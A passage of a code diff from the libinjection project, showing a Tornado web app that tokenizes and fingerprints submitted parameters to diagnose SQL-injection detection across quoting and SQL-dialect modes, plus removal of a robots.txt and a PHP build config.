parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL))
|
||||
|
||||
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
|
||||
self.add_header('Pragma', 'no-cache')
|
||||
self.add_header('Expires', '0')
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.render("tokens.html",
|
||||
title='libjection sqli token parsing diagnostics',
|
||||
version = libinjection.version(),
|
||||
parsed=parsed,
|
||||
formvalue=val,
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
def get_fingerprints(self):
|
||||
#unquote = urllib.unquote
|
||||
#detectsqli = libinjection.detectsqli
|
||||
|
||||
ids = self.request.arguments.get('id', [])
|
||||
if len(ids) == 1:
|
||||
formvalue = ids[0]
|
||||
else:
|
||||
formvalue = ''
|
||||
|
||||
args = []
|
||||
extra = {}
|
||||
qssqli = False
|
||||
|
||||
sqlstate = libinjection.sqli_state()
|
||||
|
||||
allfp = {}
|
||||
for name,values in self.request.arguments.iteritems():
|
||||
if name == 'type':
|
||||
continue
|
||||
|
||||
fps = []
|
||||
|
||||
val = values[0]
|
||||
val = urllib.unquote(val)
|
||||
if len(val) == 0:
|
||||
continue
|
||||
libinjection.sqli_init(sqlstate, val, 0)
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['unquoted', 'ansi', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['unquoted', 'mysql', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['single', 'ansi', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['single', 'mysql', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['double', 'mysql', issqli, pat])
|
||||
|
||||
allfp[name] = {
|
||||
'value': breakify(breakapart(val)),
|
||||
'fingerprints': fps
|
||||
}
|
||||
|
||||
for name,values in self.request.arguments.iteritems():
|
||||
if name == 'type':
|
||||
continue
|
||||
for val in values:
|
||||
# do it one more time include cut-n-paste was already url-encoded
|
||||
val = urllib.unquote(val)
|
||||
if len(val) == 0:
|
||||
continue
|
||||
|
||||
# swig returns 1/0, convert to True False
|
||||
libinjection.sqli_init(sqlstate, val, 0)
|
||||
issqli = bool(libinjection.is_sqli(sqlstate))
|
||||
|
||||
# True if any issqli values are true
|
||||
qssqli = qssqli or issqli
|
||||
val = breakapart(val)
|
||||
|
||||
pat = sqlstate.fingerprint
|
||||
if not issqli:
|
||||
pat = 'see below'
|
||||
args.append([name, val, issqli, pat])
|
||||
|
||||
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
|
||||
self.add_header('Pragma', 'no-cache')
|
||||
self.add_header('Expires', '0')
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.render("form.html",
|
||||
title='libjection sqli diagnostic',
|
||||
version = libinjection.version(),
|
||||
is_sqli=qssqli,
|
||||
args=args,
|
||||
allfp = allfp,
|
||||
formvalue=formvalue,
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
import os
|
||||
settings = {
|
||||
"static_path": os.path.join(os.path.dirname(__file__), "static"),
|
||||
"template_path": os.path.join(os.path.dirname(__file__), "."),
|
||||
"xsrf_cookies": False,
|
||||
"gzip": False
|
||||
}
|
||||
|
||||
application = tornado.web.Application([
|
||||
(r"/diagnostics", NullHandler),
|
||||
(r'/xsstest', XssTestHandler),
|
||||
(r'/bootstrap/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/bootstrap' }),
|
||||
(r'/jquery/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/jquery' }),
|
||||
(r'/robots.txt', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
|
||||
(r'/favicon.ico', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
|
||||
(r"/([a-z-]*)", PageHandler)
|
||||
], **settings)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
tornado.options.parse_command_line()
|
||||
|
||||
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s %(process)d %(message)s")
|
||||
|
||||
application.listen(8888)
|
||||
tornado.ioloop.IOLoop.instance().start()
|
||||
|
Binary file not shown.
Before Width: | Height: | Size: 1.9 KiB |
Binary file not shown.
Before Width: | Height: | Size: 4.2 KiB |
Binary file not shown.
Before Width: | Height: | Size: 3.1 KiB |
|
@ -1,2 +0,0 @@
|
|||
User-agent: *
|
||||
Disallow:
|
|
@ -1,13 +0,0 @@
|
|||
dnl based on
|
||||
dnl http://www.php.net/manual/en/internals2.buildsys.configunix.php
|
||||
|
||||
|
||||
PHP_ARG_ENABLE(libinjection, for libinjection support,
|
||||
[ --enable-libinjection Include libinjection])
|
||||
|
||||
dnl Check whether the extension is enabled at all
|
||||
if test "$PHP_LIBINJECTION" != "no"; then
|
||||
dnl Finally, tell the build system about the extension and what files are needed
|
||||
PHP_NEW_EXTENSION(libinjection, libinjection_sqli.c libinjection_wrap.c, $ext_shared)
|
||||
PHP_SUBST(LIBINJECTION_SHARED_LIBADD)
|
||||
fi
|
Some files were not shown because too many files have changed in this diff Show More